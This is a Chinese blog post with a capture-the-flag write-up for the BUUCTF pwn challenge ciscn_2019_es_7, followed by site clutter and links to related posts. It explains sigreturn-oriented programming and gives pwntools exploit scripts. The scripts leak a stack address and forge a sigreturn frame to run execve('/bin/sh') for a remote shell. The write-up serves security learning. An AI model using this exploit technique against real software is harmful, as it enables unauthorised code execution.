buuctf ciscn_2019_es_7的wp

最新推荐文章于 2024-01-30 19:53:40 发布
最新推荐文章于 2024-01-30 19:53:40 发布
阅读量1.2k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/114854636
版权

在这里插入图片描述
打开一看,我觉得是srop,具体知识不先介绍了
在这里插入图片描述
这是一个最简单的攻击。在这个攻击中,有4个前提条件:
第一,攻击者可以通过stack overflow等漏洞控制栈上的内容;
第二,需要知道栈的地址(比如需要知道自己构造的字符串/bin/sh的地址);
第三,需要知道syscall指令在内存中的地址;
第四,需要知道sigreturn系统调用的内存地址。
我们先要泄露buf在栈上的地址,我们能在sys_read上写0x20个,而wirte可以打印0x30的,
可以泄露

from pwn import *
from LibcSearcher import *
#sh=process("./ciscn_2019_es_7.dms")
context.arch='amd64'
sh=remote("f.buuoj.cn",20179)
syscall_ret=0x400517
read=0x4004f1
movrax_sigreturn=0x4004da
movrax_system=0x4004E2
sh.send("/bin/sh"+"\x00"*9+p64(read))
sh.recv(32)
stack_addr=u64(sh.recv(8))
log.success("stack: "+hex(stack_addr))
sh.recv(8)

在这里插入图片描述
调试的时候使用info proc map命令查看当前进程的内存映射
在这里插入图片描述
计算两者的偏移,每次加载的地址都不一样,但是泄露的栈地址和bin/sh的偏移是固定的,所以我们可以用stack_addr-0x118来表示bin/sh的地址
这里面就有了栈地址和bin/sh的地址,满足了第二个条件
找一下syscall;ret指令在内存中的地址,利用SROP构造系统调用串(System call chains),满足了第三个条件
在这里插入图片描述

最后找找sigreturn系统调用的内存地址
在这里插入图片描述
给我们把rax复制我们想要的,很贴心
条件都满足了,接下来就可以用pwntools来帮助我们生成这个Signal Frame了
pwntools可以完成
exp

from pwn import *
from LibcSearcher import *
#context.arch='amd64'
context(os='linux',arch='amd64',log_level='debug')

p=process("./ciscn_2019_es_7")
#p=remote('node3.buuoj.cn',26447)

syscall_ret=0x400517
sigreturn_addr=0x4004da
system_addr=0x4004E2	

rax=0x4004f1

p.send(b"/bin/sh"+b"\x00"*9+p64(rax))
p.recv(32)
stack_addr=u64(p.recv(8))
log.success("stack: "+hex(stack_addr))
p.recv(8)

#gdb.attach(p)

sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = stack_addr - 0x118  
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret

p.send(b"/bin/sh"+"\x00"*(0x1+0x8)+p64(sigreturn_addr)+p64(syscall_ret)+str(sigframe))

p.interactive()
w0nderMaker
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Elasticsearch 中国开发者调查报告_2019.pdf
12-20
2010年 Elasticsearch 首个版本发布, 经过近10年的更新迭代,Elastic Stack 生态已经日渐成熟,Elastic 软件在国内拥有越来越多的用户,应用 Elasticsearch 的开发人群也不断扩大。 为了深入了解 Elasticsearch 开发者群体的现状,2019 年 11 月,Elastic 技术社区、阿里巴巴 Elasticsearch 技术团队和阿里云开发者社区三方联合发起了 Elasticsearch 开发者调研活动。
赛点资源数据包_嵌入式_2019.zip
06-28
赛点资源数据包_嵌入式_2019.zip
OpenGL_ES.rar_OpenGL_ES
09-22
这是一份关于3D图形编程OpenGL ES的基础入门文档资料,对于想学习3D编程的人来说,有一定的帮助作用。
2019年欧洲车身会议蔚来ES8_Benchmark数据.pdf
01-21
2019年欧洲车身会议蔚来ES8_Benchmark数据
GLView.rar_class A_opengl es
09-19
A helper class to simplify writing an Activity that renders using OpenGL ES.
buuctf ciscn_2019_es_7
qq_42728977的博客
04-13 809
srop 之前听说过,但是没做过,今天算是见识了。 整体思路就是 就是在内核返回到用户时,会把原来的context(保存在栈里)给复原,栈里
[BUUCTF]ciscn_2019_es_7(SROP)
zyxx_wjc的博客
07-12 317
[BUUCTF]ciscn_2019_es_7
[BUUCTF]PWN——ciscn_2019_es_7[详解]
mcmuyanga的博客
01-12 1473
ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想到了SROP,之前遇到过一次,关于原理可以看一下这两篇文章 https://www.freebuf.com/articles/network/87447.html https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr
ciscn_2019_es_7
m0_73756460的博客
02-27 159
buu刷题ciscn_2019_es_7【wp
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1773
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
ciscn_2019_sw_7
seaaseesa的博客
05-01 525
ciscn_2019_sw_7 首先检查一下程序的保护机制 然后,我们用IDA分析一下,最多创建10个堆,并且size不能超过0x60 Delete功能没有清空指针,因此可以double free。 由于size受限制,因此我们需要伪造一个unsorted bin范围的chunk,glibc版本2.27,存在tcache,因此,我们还要先攻击tcache bin表头,篡改对应的...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 265
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
ciscn_2019_es_7 6/100
m0_57754423的博客
03-02 271
漏洞点: 经典SROP write函数泄露栈的地址 栈上写入'/bin/sh'字符串,控制rdi为 sh 字符串地址,rax为sigreturn系统调用号 exp: from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './es_7' debug = 1 if debug: r = remote('node4.buuoj.cn', 28915) else: r
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 409
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
STM32H562实现FreeRTOS内存管理【支持STM32H系列单片机】.zip
最新发布
06-03
STM32H562 FreeRTOS驱动程序,支持STM32H系列单片机。 项目代码可直接运行~
恶魔轮盘.cpp
06-03
恶魔轮盘
基于C++&OPENCV 的全景图像拼接.zip
06-03
基于C++&OPENCV 的全景图像拼接 C++是一种广泛使用的编程语言,它是由Bjarne Stroustrup于1979年在新泽西州美利山贝尔实验室开始设计开发的。C++是C语言的扩展,旨在提供更强大的编程能力,包括面向对象编程和泛型编程的支持。C++支持数据封装、继承和多态等面向对象编程的特性和泛型编程的模板,以及丰富的标准库,提供了大量的数据结构和算法,极大地提高了开发效率。12 C++是一种静态类型的、编译式的、通用的、大小写敏感的编程语言,它综合了高级语言和低级语言的特点。C++的语法与C语言非常相似,但增加了许多面向对象编程的特性,如类、对象、封装、继承和多态等。这使得C++既保持了C语言的低级特性,如直接访问硬件的能力,又提供了高级语言的特性,如数据封装和代码重用。13 C++的应用领域非常广泛,包括但不限于教育、系统开发、游戏开发、嵌入式系统、工业和商业应用、科研和高性能计算等领域。在教育领域,C++因其结构化和面向对象的特性,常被选为计算机科学和工程专业的入门编程语言。在系统开发领域,C++因其高效性和灵活性,经常被作为开发语言。游戏开发领域中,C++由于其高效性和广泛应用,在开发高性能游戏和游戏引擎中扮演着重要角色。在嵌入式系统领域,C++的高效和灵活性使其成为理想选择。此外,C++还广泛应用于桌面应用、Web浏览器、操作系统、编译器、媒体应用程序、数据库引擎、医疗工程和机器人等领域。16 学习C++的关键是理解其核心概念和编程风格,而不是过于深入技术细节。C++支持多种编程风格,每种风格都能有效地保证运行时间效率和空间效率。因此,无论是初学者还是经验丰富的程序员,都可以通过C++来设计和实现新系统或维护旧系统。3
es 删除数据_干货 | 携程Elasticsearch数据同步实践
06-07
抱歉,我不太明白您的问题。您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_doc/1 ``` 您也可以使用 Query DSL 来删除与特定条件匹配的多个文档。例如,以下命令将删除所有 age 字段小于 30 的文档: ``` DELETE /my_index/_doc/_delete_by_query { "query": { "range": { "age": { "lt": 30 } } } } ``` 希望这可以帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值